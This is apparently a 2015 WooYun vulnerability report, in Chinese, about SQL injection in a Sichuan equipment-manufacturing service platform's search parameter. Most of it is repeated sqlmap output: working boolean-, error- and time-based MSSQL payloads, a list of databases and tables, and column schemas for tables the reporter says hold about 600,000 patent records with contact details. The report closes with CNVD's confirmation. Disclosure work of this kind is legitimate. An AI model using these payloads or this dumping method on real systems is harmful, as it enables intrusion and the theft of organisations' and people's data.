乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-24: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经确认,细节仅向厂商公开 2015-11-06: 细节向核心白帽子及相关领域专家公开 2015-11-16: 细节向普通白帽子公开 2015-11-26: 细节向实习白帽子公开 2015-12-11: 细节向公众公开
四川省装备制造技术服务平台SQL注射。泄露众多信息包含60万专利授权号,申请号,信箱,传真,利税 完成人,完成单位,投资金额。联系人,联系单位名称,获奖情况,电话,等等
http://**.**.**.**/SubPage/hyzx_list.aspx?s=%e8%a1%8c%e4%b8%9a%e8%b5%84%e8%ae%af (GET)
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] bole[*] ccjys[*] master[*] model[*] msdb[*] operation[*] ReportServer[*] ReportServerTempDB[*] SCJX[*] tempdb
Database: bole[48 tables]+-----------------+| AddedService || BrandCard || CarOrder || Recruitment || about || address || admin || advice || base || business || car || carGroup || card || charter || city || comment || contents || coupon || credit || dtproperties || faq || firm || gift || helpCate || helpInfo || integral || links || lot || new_member || news || order_list || order_state || passager || picture || price || products || promotion || reg || reg_user || relate || server_add || server_to_order || stand || store || type || webbase || zhours || zmintues |+-----------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: bole[48 tables]+-----------------+| AddedService || BrandCard || CarOrder || Recruitment || about || address || admin || advice || base || business || car || carGroup || card || charter || city || comment || contents || coupon || credit || dtproperties || faq || firm || gift || helpCate || helpInfo || integral || links || lot || new_member || news || order_list || order_state || passager || picture || price || products || promotion || reg || reg_user || relate || server_add || server_to_order || stand || store || type || webbase || zhours || zmintues |+-----------------+Database: bole+---------------------+---------+| Table | Entries |+---------------------+---------+| dbo.address | 60 || dbo.base | 30 || dbo.helpCate | 26 || dbo.zhours | 24 || dbo.CarOrder | 22 || dbo.news | 22 || dbo.car | 18 || dbo.helpInfo | 14 || dbo.picture | 14 || dbo.type | 14 || dbo.gift | 12 || dbo.carGroup | 11 || dbo.coupon | 11 || dbo.server_add | 11 || dbo.firm | 10 || dbo.faq | 9 || dbo.BrandCard | 8 || dbo.promotion | 8 || dbo.credit | 7 || dbo.links | 6 || dbo.products | 6 || dbo.zmintues | 6 || dbo.AddedService | 4 || dbo.business | 4 || dbo.card | 4 || dbo.passager | 4 || dbo.price | 4 || dbo.reg_user | 4 || dbo.server_to_order | 3 || dbo.city | 2 || dbo.new_member | 2 || dbo.order_list | 2 || dbo.order_state | 2 || dbo.reg | 2 || dbo.stand | 2 || dbo.store | 2 || dbo.admin | 1 || dbo.relate | 1 || dbo.webbase | 1 |+---------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] bole[*] ccjys[*] master[*] model[*] msdb[*] operation[*] ReportServer[*] ReportServerTempDB[*] SCJX[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: ccjys+--------------------+---------+| Table | Entries |+--------------------+---------+| dbo.News | 716 || dbo.PicShowNews | 276 || dbo.News$ | 224 || dbo.GuestBook | 49 || dbo.Products | 48 || dbo.Contact | 27 || dbo.Contact$ | 27 || dbo.Certificate | 23 || dbo.DownLoads | 23 || dbo.Certificate$ | 22 || dbo.PicShowNews$ | 19 || dbo.Products$ | 15 || dbo.DownLoads$ | 12 || dbo.News_Category | 11 || dbo.WebConfig | 11 || dbo.WebConfig$ | 11 || dbo.Users | 9 || dbo.Links | 6 || dbo.Links$ | 6 || dbo.News_Category$ | 5 || dbo.Pro_CateGory | 5 || dbo.Pro_CateGory$ | 5 || dbo.Users$ | 2 |+--------------------+---------+
Database: SCJX+--------+---------+| Table | Entries |+--------+---------+| dbo.bz | 367411 |+--------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: SCJXTable: bz[83 columns]+-------------------+----------+| Column | Type |+-------------------+----------+| bat | nvarchar || bz_bbdw | nvarchar || bz_bbrq | nvarchar || bz_gjc | nvarchar || bz_gjce | nvarchar || bz_gjflh | nvarchar || bz_qdbz | nvarchar || bz_ssrq | nvarchar || bz_udc | nvarchar || bz_zgflh | nvarchar || bz_ztflh | nvarchar || bzft_zgflh1 | nvarchar || databass鏍囪瘑 | nvarchar || fbrq | nvarchar || id | bigint || key_old | nvarchar || pdf_path | nvarchar || pdfname | nvarchar || UDC鍒嗙被鍙? | nvarchar || WFInstitutionName | nvarchar || ys涓浗鏍囧噯鍒嗙被鍙? | nvarchar || zd_cd | decimal || zd_in | decimal || zwmc_txt | nvarchar || 涓浗鍒嗙被鍙稯LD | nvarchar || 涓浗鏍囧噯鍒嗙被鍙? | nvarchar || 涓浗鏍囧噯鍒嗙被鍙? | nvarchar || 涓浗鏍囧噯鍒嗙被鍙疯仛绫? | nvarchar || 涓浘鍒嗙被鍙? | nvarchar || 涓枃鍏抽敭璇? | nvarchar || 涓婚鏍囬 | nvarchar || 浠f浛鏍囧噯 | nvarchar || 淇敼浠? | nvarchar || 鍘熸枃鍏抽敭璇? | nvarchar || 鍘熸枃鏍囧噯鍚嶇О | nvarchar || 鍙戝竷鍗曚綅 | nvarchar || 鍙戝竷鏃ユ湡 | nvarchar || 鍥藉埆浠g爜 | nvarchar || 鍥介檯鏍囧噯鍒嗙被鍙? | nvarchar || 瀹炴柦鏃ユ湡 | nvarchar || 搴熸渚濇嵁 | nvarchar || 搴熸淇℃伅鏉ユ簮 | nvarchar || 搴熸鎯呭喌 | nvarchar || 搴熸鏃ユ湡 | nvarchar || 寮€鏈〉鏁? | nvarchar || 寮曠敤鏍囧噯 | nvarchar || 鎴鏃ユ湡 | nvarchar || 鎵€灞炴爣鍑? | nvarchar || 鎵瑰噯鍗曚綅 | nvarchar || 鎺掑簭鐮? | nvarchar || 鏀跺埌鏁版嵁鏃ユ湡 | datetime || 鏁版嵁搴撴爣璇? | nvarchar || 鏂版爣鍑嗗彿 | nvarchar || 鏄惁鏈夎瘧鏂囩増鏈? | nvarchar || 鏇夸唬鏍囧噯 | nvarchar || 鏍囧噯浠e彿F2 | nvarchar || 鏍囧噯鍙穎irst | nvarchar || 鏍囧噯鍚嶇О | nvarchar || 鏍囧噯姘村钩 | nvarchar || 鏍囧噯鐘舵€? | nvarchar || 鏍囧噯绉嶇被 | nvarchar || 鏍囧噯绫诲瀷 | nvarchar || 鏍囧噯缂栧彿 | nvarchar || 鏍囧噯缂栧彿ys | nvarchar || 鏍囧噯鑻辨枃鍚嶇О | nvarchar || 姝f枃璇 | nvarchar || 姣嶄綋鏂囩尞 | nvarchar || 纭鏃ユ湡 | nvarchar || 绱㈠彇鍙? | nvarchar || 鑻辨枃鍏抽敭璇? | nvarchar || 鑻辨枃鍚嶇О | nvarchar || 琛ュ厖浠? | nvarchar || 璁板綍id | nvarchar || 璁板綍鏍囪瘑绗? | nvarchar || 璁板綍鐘舵€? | nvarchar || 璧疯崏浜? | nvarchar || 璧疯崏鍗曚綅 | nvarchar || 閲囩敤鍏崇郴 | nvarchar || 闄勬敞 | nvarchar || 椤垫暟 | nvarchar || 椤垫暟寮€鏈? | nvarchar || 棰佸竷骞翠唤 | nvarchar || 棣嗚棌鏍囧織 | nvarchar |+-------------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: SCJXTable: cg[73 columns]+-------------+----------+| Column | Type |+-------------+----------+| id | bigint || 涓撳埄鎺堟潈鍙? | nvarchar || 涓撳埄鐢宠鍙? | nvarchar || 涓撳埄椤规暟 | nvarchar || 涓浘鍒嗙被鍙? | nvarchar || 涓婚璇? | nvarchar || 浜у€? | nvarchar || 浼犵湡 | nvarchar || 淇℃伅鏉ユ簮 | nvarchar || 淇$ | nvarchar || 鍏ュ簱鏃堕棿 | nvarchar || 鍏竷鍒婄墿鍚嶉〉鏁? | nvarchar || 鍒楀叆鏃堕棿 | nvarchar || 鍒涙眹 | nvarchar || 鍒╃◣ | nvarchar || 鍘熼」鐩勾搴︾紪鍙? | nvarchar || 鍙戝竷鍗曚綅 | nvarchar || 鍩哄眰缂栧彿 | nvarchar || 澶囨敞 | nvarchar || 瀹屾垚浜? | nvarchar || 瀹屾垚鍗曚綅 | nvarchar || 宸ヤ綔璧锋鏃堕棿 | nvarchar || 搴旂敤琛屼笟鍚嶇О | nvarchar || 搴旂敤琛屼笟鐮? | nvarchar || 寤鸿鏈? | nvarchar || 鎴愭灉涓枃鍚嶇О | nvarchar || 鎴愭灉鍏竷鏃ユ湡 | nvarchar || 鎴愭灉瀵嗙骇 | nvarchar || 鎴愭灉姘村钩 | nvarchar || 鎴愭灉绠€浠? | nvarchar || 鎴愭灉绫诲埆 | nvarchar || 鎴愭灉绫诲瀷 | nvarchar || 鎶曡祫娉ㄩ噴 | nvarchar || 鎶曡祫璇存槑 | nvarchar || 鎶曡祫閲戦 | nvarchar || 鎺ㄥ箍鎯呭喌璇存槑 | nvarchar || 鎺ㄥ箍鏂瑰紡 | nvarchar || 鎺ㄥ箍鐨勫繀瑕佹€у強鎺ㄥ箍棰勬祴 | nvarchar || 鎺ㄥ箍鑼冨洿 | nvarchar || 鎺ㄥ箍璺熻釜 | nvarchar || 鎺ㄨ崘鏃ユ湡 | nvarchar || 鎺ㄨ崘鐧昏鍙? | nvarchar || 鎺ㄨ崘閮ㄩ棬 | nvarchar || 鎺ㄨ崘閮ㄩ棬鐮? | nvarchar || 鐢虫姤鍗曚綅鍚? | nvarchar || 鐢虫姤鏃ユ湡 | nvarchar || 鐧昏鍙? | nvarchar || 鐧昏鏃ユ湡 | nvarchar || 鐧昏閮ㄩ棬 | nvarchar || 鐧昏閮ㄩ棬鐮? | nvarchar || 鐪佸競 | nvarchar || 缂栧彿 | int || 鑱旂郴浜? | nvarchar || 鑱旂郴鍗曚綅鍚嶇О | nvarchar || 鑱旂郴鍦板潃 | nvarchar || 鑱旂郴鐢佃瘽 | nvarchar || 鑺傝祫 | nvarchar || 鑾峰鎯呭喌 | nvarchar || 璁″垝鍚嶇О | nvarchar || 璁板綍鐘舵€? | nvarchar || 璁板綍绫诲瀷 | nvarchar || 璧勬枡鍏竷鏃ユ湡 | nvarchar || 杞鍐呭 | nvarchar || 杞鏂瑰紡 | nvarchar || 杞鏉′欢 | nvarchar || 杞娉ㄩ噴 | nvarchar || 杞鑼冨洿 | nvarchar || 杞璐? | nvarchar || 閭斂缂栫爜 | nvarchar || 閴村畾鏃ユ湡 | nvarchar || 閴村畾閮ㄩ棬 | nvarchar || 闄愬埗浣跨敤 | nvarchar || 椤圭洰骞村害缂栧彿 | nvarchar |+-------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 4863=4863 AND 'RQYV'='RQYV Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: s=%E8%A1%8C%E4%B8%9A%E8%B5%84%E8%AE%AF' AND 6047=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (6047=6047) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113))) AND 'aOtI'='aOtI Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: s=-8762' OR 5242=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'zFcw'='zFcw---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: SCJX+--------+---------+| Table | Entries |+--------+---------+| dbo.cg | 597790 |+--------+---------+
主要跑几个数据高的
60万详细的
危害等级:高
漏洞Rank:10
确认时间:2015-10-27 16:59
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无